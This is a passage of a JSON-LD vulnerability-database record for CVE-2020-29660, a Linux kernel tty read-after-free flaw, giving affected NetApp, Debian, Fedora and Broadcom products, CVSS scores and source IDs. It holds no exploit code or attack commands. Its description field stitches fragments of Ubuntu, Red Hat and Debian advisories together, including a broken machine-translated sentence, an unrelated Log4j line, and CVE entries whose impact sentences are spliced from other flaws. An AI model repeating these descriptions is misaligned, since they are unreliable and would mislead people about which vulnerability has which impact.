      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-1547",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.9.13"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.9.13",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:fabric_operating_system:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      }
    ],
    "trust": 1.1
  },
  "cve": "CVE-2020-29660",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2020-29660",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.4,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-29660",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-29660",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-776",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-29660",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24. Vendors must CID-c8bcd9c5be24 It is published as.Information may be obtained. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. ==========================================================================\nUbuntu Security Notice USN-4752-1\nFebruary 25, 2021\n\nlinux-oem-5.6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-oem-5.6: Linux kernel for OEM systems\n\nDetails:\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper Rasmussen discovered\nthat legacy pairing and secure-connections pairing authentication in the\nBluetooth protocol could allow an unauthenticated user to complete\nauthentication without pairing credentials via adjacent access. A\nphysically proximate attacker could use this to impersonate a previously\npaired Bluetooth device. (CVE-2020-10135)\n\nJay Shin discovered that the ext4 file system implementation in the Linux\nkernel did not properly handle directory access with broken indexing,\nleading to an out-of-bounds read vulnerability. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2020-14314)\n\nIt was discovered that the block layer implementation in the Linux kernel\ndid not properly perform reference counting in some situations, leading to\na use-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash). (CVE-2020-15436)\n\nIt was discovered that the serial port driver in the Linux kernel did not\nproperly initialize a pointer in some situations. A local attacker could\npossibly use this to cause a denial of service (system crash). \n(CVE-2020-15437)\n\nAndy Nguyen discovered that the Bluetooth HCI event packet parser in the\nLinux kernel did not properly handle event advertisements of certain sizes,\nleading to a heap-based buffer overflow. A physically proximate remote\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2020-24490)\n\nIt was discovered that the NFS client implementation in the Linux kernel\ndid not properly perform bounds checking before copying security labels in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-25212)\n\nIt was discovered that the Rados block device (rbd) driver in the Linux\nkernel did not properly perform privilege checks for access to rbd devices\nin some situations. A local attacker could use this to map or unmap rbd\nblock devices. A local attacker could use this\nto cause a denial of service. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. A privileged attacker\ncould use this to cause a denial of service (kernel memory exhaustion). A local attacker in a\nguest VM could possibly use this to cause a denial of service (host system\ncrash). A local attacker\ncould use this to possibly cause a denial of service (system crash). A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2020-28588)\n\nIt was discovered that the framebuffer implementation in the Linux kernel\ndid not properly perform range checks in certain situations. A local\nattacker could use this to expose sensitive information (kernel memory). A local attacker could use\nthis to gain unintended write access to read-only memory pages. \n(CVE-2020-29368)\n\nJann Horn discovered that the mmap implementation in the Linux kernel\ncontained a race condition when handling munmap() operations, leading to a\nread-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possibly expose sensitive information. \n(CVE-2020-29369)\n\nJann Horn discovered that the romfs file system in the Linux kernel did not\nproperly validate file system meta-data, leading to an out-of-bounds read. \nAn attacker could use this to construct a malicious romfs image that, when\nmounted, exposed sensitive information (kernel memory). A local attacker could use this to cause a denial of service\n(system crash) or possibly expose sensitive information (kernel memory). A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2020-29661)\n\nIt was discovered that a race condition existed that caused the Linux\nkernel to not properly restrict exit signal delivery. A local attacker\ncould possibly use this to send signals to arbitrary processes. \n(CVE-2020-35508)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.04 LTS:\n  linux-image-5.6.0-1048-oem      5.6.0-1048.52\n  linux-image-oem-20.04           5.6.0.1048.44\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4752-1\n  CVE-2020-10135, CVE-2020-14314, CVE-2020-15436, CVE-2020-15437,\n  CVE-2020-24490, CVE-2020-25212, CVE-2020-25284, CVE-2020-25641,\n  CVE-2020-25643, CVE-2020-25704, CVE-2020-27152, CVE-2020-27815,\n  CVE-2020-28588, CVE-2020-28915, CVE-2020-29368, CVE-2020-29369,\n  CVE-2020-29371, CVE-2020-29660, CVE-2020-29661, CVE-2020-35508\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52\n. Summary:\n\nAn update is now available for OpenShift Logging 5.3. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nOpenshift Logging Bug Fix Release (5.3.0)\n\nSecurity Fix(es):\n\n* golang: x/net/html: infinite loop in ParseFragment (CVE-2021-33194)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should  be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYZJxoNzjgjWX9erEAQji2Q//bv8hVZq0D8Dz0Do5vdoPzpjDhM6wJr7U\n3CqAqcxniXvHVbBiPHPsY3p3M62FSO5lg4oZnVfokEtrZmLe9ULZWLlNxVilAUCT\n0urKKWCAIXF+QJcW9/KCuIfaMh8Mmvh2baq52azauCHCJ3UK9ontiGWqyUz/aq9F\nTM4P/eehnUU1WXAz9x4ycHP7fHZBuADkI8WOUZ5M/QpcoEvo7rLFdyat5MpMkeJx\nj7gGieb2ITvblxEML3LRdPljQxe56w7p2jC/EoXJnssjABozlWB936Ub/QSulGuz\n+HQS+RnAGxRRpNcs1wNQzpIkCFJN2S0jlEj5VLB8xLbZTYtILWhIx4rlwaFy6NJn\n/z7hpEfSAgmhPTejshI/2Gfu/sc+KStEJk2IasWO1wqQWRqYGVeLwgHxBt2wpX+I\nXJUjhkAdhAWyDfEhPXzpbN4dhmDk0QiGfL3KWZ8nO54IFQgZHT1P1YArnI1hMWC7\nJhTyj1DtFOKJl8X28wf6RNui+ifD12hmIAuQRuJTPjZbTnywwpMy+Sq9mrfeHztb\ngPt2AqOPF5ksNB6OsjVKlMScLlLJzzlkBVgmurXaly0z2qLjy0Rl70oWeMOW4xUD\n4Ravk3PLEMqSIHv0ECr4ku5ejMV1Rd46USrgVX2R0CALXIxPkk1IEN8hHmzIGz2D\nHHJuAvrlroc=\n=di1X\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. If you are running a kernel version earlier than the one listed\nbelow, please upgrade your kernel as soon as possible. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4843-1                   security@debian.org\nhttps://www.debian.org/security/                     Salvatore Bonaccorso\nFebruary 01, 2021                     https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2020-27815 CVE-2020-27825 CVE-2020-27830 CVE-2020-28374\n                 CVE-2020-29568 CVE-2020-29569 CVE-2020-29660 CVE-2020-29661\n                 CVE-2020-36158 CVE-2021-3347 CVE-2021-20177\nDebian Bug     : 970736 972345 977048 977615\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2020-27825\n\n    Adam \u0027pi3\u0027 Zabrocki reported a use-after-free flaw in the ftrace\n    ring buffer resizing logic due to a race condition, which could\n    result in denial of service or information leak. \n\nCVE-2020-27830\n\n    Shisong Qin reported a NULL pointer dereference flaw in the Speakup\n    screen reader core driver. \n\nCVE-2020-28374\n\n    David Disseldorp discovered that the LIO SCSI target implementation\n    performed insufficient checking in certain XCOPY requests. An\n    attacker with access to a LUN and knowledge of Unit Serial Number\n    assignments can take advantage of this flaw to read and write to any\n    LIO backstore, regardless of the SCSI transport settings. \n\nCVE-2020-29568 (XSA-349)\n\n    Michael Kurth and Pawel Wieczorkiewicz reported that frontends can\n    trigger OOM in backends by updating a watched path. A\n    misbehaving guest can trigger a dom0 crash by continuously\n    connecting / disconnecting a block frontend. \n\nCVE-2020-36158\n\n    A buffer overflow flaw was discovered in the mwifiex WiFi driver\n    which could result in denial of service or the execution of\n    arbitrary code via a long SSID value. A privileged user (with root or CAP_NET_ADMIN) can\n    take advantage of this flaw to cause a kernel panic when inserting\n    iptables rules. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.19.171-2. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmAXj9pfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Tf5Q//RdQojeX7VtJ61PsVXRszZh9DJ3PUo64NheFU+QWUYO7F6NUD3fMxiS9K\nI8Sgfsm28x7RBambjW6TZYseJhQd9aSvaANnPdUj/eZ9P3xBhXFM8wzISosUWgfO\n2IIV40oOVj943+BzfIQiq1mgQtwLjh3pNTZAEpjnzD96Tc9tXGyW9/3iGkUHIQjv\ngUTSvoLIUAI4XfNNUjnok+6kPDyEEIdiwJaGDG+UPZ6HNL/hrG3A4klQc+X7KK5K\nNCOzl4Wl5pZN7u2Ietn3sFMsNJkMrsfLlVyj8J9PgNwbFQh/+RuvzFcONlQ8iaD9\nkx42gkLwjl+hM2UeCpvQndzwqXKPKc6CjFemDj7KWzVA+KkVBRTXCGb9K9CasZOZ\n0e/cu+5rjYGubIE3e/jo3Gmhp/fm9fXHESbruxuP+gjdbKcyrGrokNucjRvp6FPP\nrCX+e7OjsZwWGBIcAw+gDAZkDO7PFEoRtlByF2LmxxNvTufZQZHX8NwVyABCdpZi\nVQLLeQNXN1pJ4d1NPWgTlKfEmH0sGVQRHCliTkBZmIjvo+y1JClUDBAlWOS4YYQL\n4Z4oe1qtOX9z+NkqDqcbgfWw69Q2PipNN3TR5YcBXvOtVhvL+/WFGiooJDqxkdCD\nj3wO/r/1gut/bK/OJnjmOB9J5OXP+cHxYtrhPqXFy2Hzkgj1CRU=\n=u23W\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-29660",
        "trust": 4.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2020/12/10/1",
        "trust": 2.5
      },
      {
        "db": "PACKETSTORM",
        "id": "164950",
        "trust": 1.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-24-074-07",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU93656033",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "161556",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164812",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3905",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0189",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0837",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0717",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0589",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0166",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4254",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3871",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0348",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3825",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164875",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021100407",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-29660",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165296",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161551",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161553",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "161555",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164967",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169012",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "id": "VAR-202012-1547",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
